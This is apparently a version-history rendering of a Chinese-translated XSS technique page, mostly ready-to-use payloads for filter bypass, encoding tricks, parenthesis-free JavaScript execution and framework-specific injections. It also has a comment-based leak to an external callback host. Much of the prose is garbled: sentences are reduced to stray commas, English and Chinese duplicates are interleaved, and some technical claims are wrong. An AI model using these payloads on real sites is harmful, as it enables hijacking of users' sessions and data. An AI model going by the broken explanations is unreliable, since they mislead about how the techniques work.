2021-06-02 22:22:26 +00:00
2023-08-03 19:12:22 +00:00
从[**这里**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **现在可以滥用隐藏输入来进行攻击:**
2023-07-28 11:44:45 +00:00
```html
< button popvertarget = "x" > Click me< / button >
< input type = "hidden" value = "y" popover id = "x" onbeforetoggle = alert(1) >
```
2023-08-03 19:12:22 +00:00
而在**元标签**中:
2023-07-28 11:44:45 +00:00
```html
<!-- Injection inside meta attribute -->
< meta name = "apple-mobile-web-app-title" content = "" Twitter popover id = "newsletter" onbeforetoggle = alert(2) / >
<!-- Existing target -->
< button popovertarget = "newsletter" > Subscribe to newsletter< / button >
< div popover id = "newsletter" > Newsletter popup< / div >
```
2023-08-03 19:12:22 +00:00
从[**这里**](https://portswigger.net/research/xss-in-hidden-input-fields):您可以在隐藏属性中执行**XSS负载**,只要您能够**说服****受害者**按下**键盘组合键**。在Firefox Windows/Linux上, ,
2020-07-15 15:43:14 +00:00
```markup
< input type = "hidden" accesskey = "X" onclick = "alert(1)" >
```
2023-08-03 19:12:22 +00:00
**XSS负载将类似于:
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 黑名单绕过
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
在本节中已经介绍了使用不同编码的几种技巧。回到之前的部分了解可以使用的地方:
2023-02-07 10:56:16 +00:00
2023-08-03 19:12:22 +00:00
* **HTML编码( )
* **Unicode编码( ) :
* **URL编码**
* **十六进制和八进制编码**
* **数据编码**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**HTML标签和属性的绕过**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
阅读[前一节的黑名单绕过](./#blacklist-bypasses)。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**JavaScript代码的绕过**
2020-07-15 15:43:14 +00:00
2023-08-16 09:07:58 +00:00
阅读[下一节的JavaScript绕过黑名单技术](./#javascript-bypass-blacklists-techniques)。
2020-07-15 15:43:14 +00:00
2022-05-01 16:57:45 +00:00
### CSS-Gadgets
2022-02-22 10:32:26 +00:00
2023-08-16 09:07:58 +00:00
如果你在网页的一个非常小的部分发现了**XSS漏洞**, ( , ) ,
2022-02-22 10:32:26 +00:00
2023-08-03 19:12:22 +00:00
例如,你可以在元素中添加一些样式,如:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
2022-02-22 10:32:26 +00:00
2023-08-08 08:33:05 +00:00
但是, , , :
2022-02-22 10:32:26 +00:00
> .test {display:block; color: blue; width: 100%\}
2023-08-03 19:12:22 +00:00
和
2022-02-22 10:32:26 +00:00
> \#someid {top: 0; font-family: Tahoma;}
2023-08-08 08:33:05 +00:00
现在你可以修改我们的链接,将其变为:
2022-02-22 10:32:26 +00:00
> \<a href=”” id=someid class=test onclick=alert() a=””>
2023-08-03 19:12:22 +00:00
这个技巧来自于[https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
2022-02-22 10:32:26 +00:00
2023-08-03 19:12:22 +00:00
## 在JavaScript代码中注入
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
在这种情况下,你的**输入**将被**反射到`.js`文件的JS代码中**,或者在`< script > ... < / script > `标签之间, ,
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 转义\<script>标签
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果你的代码被插入到`< script > [ ... ] var input = 'reflected data' [ ... ] < / script > `中,你可以很容易地**转义关闭`< script > ` * * 标 签 :
2020-07-15 15:43:14 +00:00
```javascript
< / script > < img src = 1 onerror = alert(document.domain) >
```
2023-08-03 19:12:22 +00:00
请注意,在这个例子中,我们甚至**没有关闭单引号**,但这并不是必要的,因为**浏览器首先执行HTML解析**来识别页面元素, ,
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 在JS代码内部
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
如果`< >`被进行了**消毒处理**,你仍然可以在输入的**位置**上**转义字符串**并**执行任意JS代码**。重要的是要**修复JS语法**, , :
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
```
2023-10-16 21:15:46 +00:00
### 模板字符串 \`\`
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
为了构建字符串, , ** ` `` ` **。这被称为模板字符串,因为它们允许使用 `${ ... }` 语法来嵌入JS表达式。\
2023-08-03 19:12:22 +00:00
因此, , `${ ... }` 语法来执行任意的JS代码:
2023-02-07 10:56:16 +00:00
2023-10-16 21:15:46 +00:00
这可以通过以下方式滥用:
2023-02-07 10:56:16 +00:00
```javascript
`${alert(1)}`
`${` ${`${`${alert(1)}`}`}`}`
```
```````````````javascript
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop(){return loop}
loop``````````````
```````````````
2023-08-03 19:12:22 +00:00
### 编码代码执行
2023-08-16 09:07:58 +00:00
In some cases, web applications may encode user input before displaying it on the page. This encoding can be done to prevent cross-site scripting (XSS) attacks by converting special characters into their HTML entities. However, if the application does not properly decode the input before executing it, it may be possible to bypass this protection and execute malicious code.
2023-08-03 19:12:22 +00:00
2023-08-16 09:07:58 +00:00
在某些情况下, , ( ) , ,
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
To exploit this vulnerability, an attacker can inject encoded JavaScript code that will be executed by the browser after decoding. This can be achieved by encoding the JavaScript payload using various techniques such as URL encoding, HTML entity encoding, or JavaScript string encoding.
为了利用这个漏洞, , ( )
2021-06-02 22:22:26 +00:00
2023-08-24 09:57:53 +00:00
For example, consider a web application that encodes user input using HTML entity encoding. If the application fails to properly decode the input before executing it, an attacker can inject encoded JavaScript code that will be executed by the browser.
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
例如, , ,
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
```html
< script> alert('XSS')< /script>
```
In this example, the attacker injects the encoded JavaScript code `<script>alert('XSS')</script>` . When the application decodes this input and executes it, the browser will execute the JavaScript code and display an alert box with the message "XSS".
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
在这个例子中, < script> alert('XSS')< /script> `。当应用程序解码并执行此输入时,
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
To prevent this vulnerability, it is important for web applications to properly decode user input before executing it. This can be done by using appropriate decoding functions or libraries provided by the programming language or framework being used.
为了防止这种漏洞,
2021-06-04 17:27:53 +00:00
```markup
2021-06-02 22:22:26 +00:00
< script > \u0061 lert ( 1 )</ script >
2021-06-04 15:00:45 +00:00
< svg > < script > a l e r t & l p a r ; ' 1 ' & r p a r ;
2021-06-04 17:27:53 +00:00
< svg > < script > & # x61 ; & # x6C ; & # x65 ; & # x72 ; & # x74 ; & # x28 ; & # x31 ; & # x29 ; < / script > < / svg > <!-- The svg tags are neccesary
< iframe srcdoc = "<SCRIPT>alert(1)</iframe>" >
2021-06-02 22:22:26 +00:00
```
2023-08-03 19:12:22 +00:00
### Unicode编码JS执行
This technique involves using Unicode encoding to bypass input validation and execute JavaScript code on a vulnerable web application.
#### Description
2023-08-08 08:33:05 +00:00
Many web applications perform input validation to prevent users from injecting malicious code. However, some applications may not properly handle Unicode characters, allowing an attacker to bypass the validation and execute JavaScript code.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
Unicode is a character encoding standard that assigns a unique number to each character. By using Unicode encoding, an attacker can represent special characters in a way that bypasses input filters.
2023-08-03 19:12:22 +00:00
#### Exploitation
2023-10-16 21:15:46 +00:00
To exploit this vulnerability, an attacker needs to identify a vulnerable input field where JavaScript code is executed without proper validation. The attacker can then use Unicode encoding to represent the JavaScript code and bypass any input filters.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
For example, the Unicode encoding for the `<script>` tag is `\u003cscript\u003e` . By using this encoding, an attacker can inject JavaScript code without triggering the input validation.
2023-08-24 09:57:53 +00:00
2023-08-03 19:12:22 +00:00
```html
2023-08-08 08:33:05 +00:00
< input type = "text" value = " \u003cscript \u003ealert('XSS') \u003c/script \u003e" >
2023-08-03 19:12:22 +00:00
```
2023-10-16 21:15:46 +00:00
When the vulnerable web application renders this input field, it will execute the JavaScript code and display an alert box with the message "XSS".
2023-08-03 19:12:22 +00:00
#### Prevention
2021-06-02 22:22:26 +00:00
2023-10-16 21:15:46 +00:00
To prevent this type of vulnerability, it is important to implement proper input validation and sanitization techniques. All user input should be properly validated and filtered to prevent the execution of malicious code.
Additionally, web application frameworks and libraries often provide built-in protection against XSS attacks. It is recommended to use these security features and keep them up to date.
#### Conclusion
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
Unicode encoding can be used to bypass input validation and execute JavaScript code on a vulnerable web application. It is important for developers to implement proper input validation and sanitization techniques to prevent this type of vulnerability.
2023-02-07 10:56:16 +00:00
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
2023-08-03 19:12:22 +00:00
### JavaScript绕过黑名单技术
2023-02-07 10:56:16 +00:00
2023-08-03 19:12:22 +00:00
**字符串**
2020-07-15 15:43:14 +00:00
```javascript
"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
2023-02-07 10:56:16 +00:00
"\h\e\l\l\o"
2020-07-15 15:43:14 +00:00
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
2021-06-02 22:22:26 +00:00
"\a\l\ert\(1\)"
2020-07-15 15:43:14 +00:00
atob("dGhpc2lzYXN0cmluZw==")
2021-06-04 17:18:34 +00:00
eval(8680439..toString(30))(983801..toString(36))
2020-07-15 15:43:14 +00:00
```
2023-08-08 08:33:05 +00:00
**特殊转义**
2023-10-16 21:15:46 +00:00
In some cases, the target application may have implemented special escapes to prevent XSS attacks. These special escapes are designed to encode certain characters or strings in order to neutralize any potential malicious code. As a penetration tester, it is important to be aware of these special escapes and understand how they can impact your XSS payloads.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
在某些情况下, , ,
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
Here are some common special escapes that you may encounter during your XSS testing:
2023-02-07 10:56:16 +00:00
2023-10-16 21:15:46 +00:00
以下是在XSS测试中可能遇到的一些常见特殊转义:
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
- **HTML Entity Encoding**: This escape technique involves replacing special characters with their corresponding HTML entities. For example, the `<` character is replaced with `<` and the `>` character is replaced with `>` . This prevents the browser from interpreting the characters as HTML tags.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
- **HTML实体编码**: , < `字符被替换为`< `, > `。这样可以防止浏览器将这些字符解释为HTML标签。
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
- **JavaScript String Escaping**: This escape technique involves adding backslashes before certain characters in JavaScript strings. For example, the double quote `"` character is escaped as `\"` and the single quote `'` character is escaped as `\'` . This prevents the browser from interpreting the characters as part of a JavaScript string.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
- **JavaScript字符串转义**: , `,单引号` '`字符被转义为`\'`。这样可以防止浏览器将这些字符解释为JavaScript字符串的一部分。
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
- **URL Encoding**: This escape technique involves encoding special characters in URLs using percent encoding. For example, the space character is encoded as `%20` and the slash `/` character is encoded as `%2F` . This prevents the browser from misinterpreting the characters in the URL.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
- **URL编码**: ,
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
It is important to understand and account for these special escapes when crafting your XSS payloads. Failure to do so may result in your payloads being neutralized and the XSS vulnerability being mitigated.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
在构造XSS有效载荷时, , ,
2023-02-07 10:56:16 +00:00
```javascript
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
// Any other char escaped is just itself
```
2023-08-03 19:12:22 +00:00
**JS代码中的空格替换**
2023-08-24 09:57:53 +00:00
In some cases, when attempting to inject malicious code through XSS, certain characters may be filtered or blocked by the application. One common technique to bypass these filters is to use space substitutions within the JavaScript code.
在某些情况下, ,
2023-10-16 21:15:46 +00:00
For example, if the application filters the `<script>` tag or certain JavaScript keywords, we can use space substitutions to bypass these filters. The idea is to split the malicious code into multiple parts and use spaces to separate them.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
例如,如果应用程序过滤`< script > ` 标 签 或 某 些 J a v a S c r i p t 关 键 字 , 我 们 可 以 使 用 空 格 替 换 来 绕 过 这 些 过 滤 器 。 思 路 是 将 恶 意 代 码 分 成 多 个 部 分 , 并 使 用 空 格 将 它 们 分 隔 开 。
2023-08-03 19:12:22 +00:00
2023-08-24 09:57:53 +00:00
Here is an example of how space substitutions can be used:
2023-02-07 10:56:16 +00:00
2023-08-24 09:57:53 +00:00
下面是使用空格替换的示例:
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
```html
< script >
2023-10-16 21:15:46 +00:00
var payload = 'alert(1)';
var payload = payload.replace(/ /g, String.fromCharCode(9));
eval(payload);
2023-08-24 09:57:53 +00:00
< / script >
```
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
In this example, the space character is replaced with the tab character (`\t`) using the ` replace()` function. This allows the malicious code to bypass any filters that may be in place.
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
在这个示例中,使用`replace()`函数将空格字符替换为制表符字符(`\t`)。这样可以使恶意代码绕过可能存在的任何过滤器。
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
It's important to note that space substitutions may not always work, as some applications may have additional filters or security measures in place. Therefore, it's crucial to thoroughly test and understand the application's security mechanisms before attempting any XSS attacks.
2023-08-08 08:33:05 +00:00
2023-10-16 21:15:46 +00:00
需要注意的是, , , ,
2020-07-15 15:43:14 +00:00
```javascript
< TAB >
/**/
```
2023-08-03 19:12:22 +00:00
**JavaScript注释( )
2023-10-16 21:15:46 +00:00
在进行跨站脚本攻击( ) , , , ,
以下是一些常见的JavaScript注释技巧, :
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
1. 单行注释:使用`//`符号可以在代码中添加单行注释。例如:
2020-07-15 15:43:14 +00:00
2023-08-24 09:57:53 +00:00
```javascript
// 这是一个单行注释
```
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
2. 多行注释:使用`/* */`符号可以在代码中添加多行注释。例如:
2023-08-08 08:33:05 +00:00
```javascript
/*
2023-08-24 09:57:53 +00:00
这是一个
多行注释
2023-08-08 08:33:05 +00:00
*/
```
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
3. 注释嵌套:可以在多行注释中嵌套单行注释,或在单行注释中嵌套多行注释。例如:
2023-08-08 08:33:05 +00:00
```javascript
2023-10-16 21:15:46 +00:00
/*
这是一个多行注释
// 这是一个嵌套的单行注释
*/
2023-08-03 19:12:22 +00:00
```
2023-10-16 21:15:46 +00:00
4. 注释终止:在注释中使用特殊字符(如`*/`)可能导致注释提前终止。为了避免这种情况,可以使用编码或其他技巧来绕过过滤器。例如:
2023-08-08 08:33:05 +00:00
```javascript
2023-10-16 21:15:46 +00:00
/*
这是一个多行注释
*\/
*/
2023-08-08 08:33:05 +00:00
```
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
了解JavaScript注释的使用可以帮助您在XSS攻击中更好地隐藏恶意代码, , ,
2020-07-15 15:43:14 +00:00
```javascript
//This is a 1 line comment
/* This is a multiline comment*/
2023-03-03 17:26:17 +00:00
<!-- This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
2020-07-15 15:43:14 +00:00
```
2023-08-16 09:07:58 +00:00
**JavaScript换行( )
2020-07-15 15:43:14 +00:00
```javascript
//Javascript interpret as new line these chars:
2023-03-03 17:26:17 +00:00
String.fromCharCode(10); alert('//\nalert(1)') //0x0a
String.fromCharCode(13); alert('//\ralert(1)') //0x0d
String.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8
String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
```
2023-08-03 19:12:22 +00:00
**JavaScript空格**
2023-08-24 09:57:53 +00:00
在编写JavaScript代码时, , , , ( )
2023-08-16 09:07:58 +00:00
2023-10-16 21:15:46 +00:00
在XSS攻击中, , ,
以下是一些常见的JavaScript空格技巧, :
2023-03-03 17:26:17 +00:00
2023-10-16 21:15:46 +00:00
- **空格编码**: , ,
- **空格混淆**:攻击者可以在恶意脚本中使用多个连续的空格字符,以混淆代码并绕过过滤机制。例如,攻击者可以使用`< script src = "malicious.js" ></ script > `来隐藏恶意脚本。
- **空格绕过**:攻击者可以使用空格字符来绕过一些简单的过滤机制。例如,攻击者可以使用`java script:`来绕过`javascript:`的过滤。
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
为了防止XSS攻击, :
2023-08-16 09:07:58 +00:00
2023-10-16 21:15:46 +00:00
- 对用户输入进行严格的验证和过滤,确保只允许预期的字符和格式。
- 对输出进行适当的编码,以防止恶意脚本的执行。
- 使用安全的编程实践,如输入验证、输出编码和参数化查询,以减少安全漏洞的风险。
通过了解JavaScript空格技巧和XSS攻击的工作原理,
2023-03-03 17:26:17 +00:00
```javascript
log=[];
function funct(){}
2023-08-03 19:12:22 +00:00
for(let i=0;i< =0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
2023-03-03 17:26:17 +00:00
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
< img / src / onerror = alert(1) >
```
2023-08-03 19:12:22 +00:00
**注释中的Javascript**
2023-03-03 17:26:17 +00:00
2023-08-08 08:33:05 +00:00
在进行Web应用程序渗透测试时, , ( ) , , ,
2023-03-03 17:26:17 +00:00
2023-08-24 09:57:53 +00:00
攻击者可以通过在注释中插入恶意的Javascript代码,
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
为了防止这种攻击, , ,
2023-03-03 17:26:17 +00:00
```javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send
//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
**没有括号的JavaScript**
2023-10-16 21:15:46 +00:00
在某些情况下, :
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
1. **函数调用** :如果函数没有参数,我们可以省略括号。例如,`alert`函数可以写成`alert`而不是`alert()`。
2023-08-03 19:12:22 +00:00
2023-10-16 21:15:46 +00:00
2. **返回函数** :如果函数返回另一个函数,我们可以省略括号。例如,`getFunction()`函数返回一个函数,我们可以写成`getFunction`而不是`getFunction()`。
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
3. **立即执行函数** :如果我们想立即执行一个函数,我们可以省略括号。例如,`(function() { ... })()`可以写成`(function() { ... })`。
2023-02-07 10:56:16 +00:00
2023-10-16 21:15:46 +00:00
请注意,省略括号可能会使代码更难阅读和理解。因此,应该谨慎使用这种技术,并确保代码的可读性不受影响。
2023-02-07 10:56:16 +00:00
````javascript
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
2023-08-03 19:12:22 +00:00
// or any DOMXSS sink such as location=name
2023-02-07 10:56:16 +00:00
// Backtips
2023-08-03 19:12:22 +00:00
// Backtips pass the string as an array of lenght 1
2023-02-07 10:56:16 +00:00
alert`1`
// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
2023-08-03 19:12:22 +00:00
// To pass several arguments you can use
2023-02-07 10:56:16 +00:00
function btt(){
2023-08-03 19:12:22 +00:00
console.log(arguments);
2023-02-07 10:56:16 +00:00
}
btt`${'arg1'}${'arg2'}${'arg3'}`
2023-08-03 19:12:22 +00:00
//It's possible to construct a function and call it
2023-02-07 10:56:16 +00:00
Function`x${'alert(1337)'}x```
2023-08-03 19:12:22 +00:00
// .replace can use regexes and call a function if something is found
2023-02-07 10:56:16 +00:00
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
2023-08-03 19:12:22 +00:00
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
2023-02-07 10:56:16 +00:00
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
2023-08-03 19:12:22 +00:00
// Using Reflect.apply to call any function with any argumnets
2023-02-07 10:56:16 +00:00
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
2023-08-03 19:12:22 +00:00
// Using Reflect.set to call set any value to a variable
2023-02-07 10:56:16 +00:00
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString
2023-08-03 19:12:22 +00:00
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
2023-02-07 10:56:16 +00:00
valueOf=alert;window+''
toString=alert;window+''
// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
< img src = x onerror = "window.onerror=eval;throw'=alert \x281 \x29'" >
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
2023-08-03 19:12:22 +00:00
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
2023-02-07 10:56:16 +00:00
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
2023-08-03 19:12:22 +00:00
// optional exception variables inside a catch clause.
2023-02-07 10:56:16 +00:00
try{throw onerror=alert}catch{throw 1}
// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
2023-08-03 19:12:22 +00:00
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
2023-02-07 10:56:16 +00:00
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md ](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md )
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix ](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix )
2023-08-03 19:12:22 +00:00
**任意函数( )
2021-10-18 11:21:18 +00:00
````javascript
2021-06-02 22:22:26 +00:00
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
2021-06-07 22:45:34 +00:00
[]["constructor"]["constructor"]`$${alert()}```
2023-03-03 17:26:17 +00:00
import('data:text/javascript,alert(1)')
2021-06-02 22:22:26 +00:00
//General function executions
2020-07-15 15:43:14 +00:00
`` //Can be use as parenthesis
alert`document.cookie`
2023-08-03 19:12:22 +00:00
alert(document['cookie'])
with(document)alert(cookie)
2020-07-15 15:43:14 +00:00
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
2021-02-25 11:39:28 +00:00
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
2021-06-02 22:22:26 +00:00
< svg > < animate onbegin = alert() attributeName = x > < / svg >
2021-10-18 11:21:18 +00:00
````
2023-08-03 19:12:22 +00:00
## **DOM漏洞**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
有一段**JS代码**正在使用由攻击者控制的**不安全数据**,比如`location.href`。攻击者可以利用这个漏洞来执行任意的JS代码。\
2023-08-08 08:33:05 +00:00
**由于对DOM漏洞的解释较长, : :
2021-05-27 11:59:23 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="dom-xss.md" %}
[dom-xss.md ](dom-xss.md )
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2023-08-03 19:12:22 +00:00
在那里,您将找到关于**DOM漏洞是什么,
2023-08-08 08:33:05 +00:00
此外,请不要忘记在**提到的帖子末尾**找到关于[**DOM Clobbering攻击**](dom-xss.md#dom-clobbering)的解释。
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
## 其他绕过方式
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 规范化Unicode
2020-07-15 15:43:14 +00:00
2023-10-16 21:15:46 +00:00
您可以检查服务器(或客户端)中的**反射值**是否被**Unicode规范化**,并利用此功能绕过保护措施。[**在此处找到一个示例**](../unicode-injection/#xss-cross-site-scripting)。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### PHP FILTER\_VALIDATE\_EMAIL标志绕过
2020-07-15 15:43:14 +00:00
```javascript
">< svg / onload = confirm(1) > "@x.y
```
2023-08-03 19:12:22 +00:00
### Ruby-On-Rails绕过
2020-07-15 15:43:14 +00:00
2023-08-08 08:33:05 +00:00
由于**RoR大规模分配**, , , ( )
表单示例([来自此报告](https://hackerone.com/reports/709336)),如果您发送以下有效载荷:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
contact[email] onfocus=javascript:alert('xss') autofocus a=a& form_type[a]aaa
```
2023-08-03 19:12:22 +00:00
键值对 "Key" 和 "Value" 将会被回显如下:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
{" onfocus=javascript:alert(' xss' ) autofocus a"=>"a"}
```
2023-08-03 19:12:22 +00:00
然后, :
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
发生了XSS攻击。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
### 特殊组合
2020-07-15 15:43:14 +00:00
```markup
< iframe / src = "data:text/html,<svg onload=alert(1)>" >
< input type = image src onerror = "prompt(1)" >
< svg onload = alert(1)//
< img src = "/" = _ = " title=" onerror = 'prompt(1)' " >
< img src = '1' onerror = 'alert(0)' <
< script x > a l e r t ( 1 ) < / s c r i p t 1 = 2
< script x > a l e r t ( ' X S S ' ) < s c r i p t y >
< svg / onload = location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
2021-06-02 16:32:07 +00:00
< svg / / / / / / / / onload = alert(1) >
< svg id = x;onload=alert(1) >
< svg id = `x`onload=alert(1) >
2020-07-15 15:43:14 +00:00
< img src = 1 alt = al lang = ert onerror = top[alt+lang](0) >
< script > $ = 1 , alert ( $ ) < / script >
< script ~ ~ ~ > c o n f i r m ( 1 ) < / s c r i p t ~ ~ ~ >
< script > $ = 1 , \u0061 lert ( $ )</ script >
<< /script/script>< script > eval ( ' \\u' + '0061' + 'lert(1)' ) / / </ script >
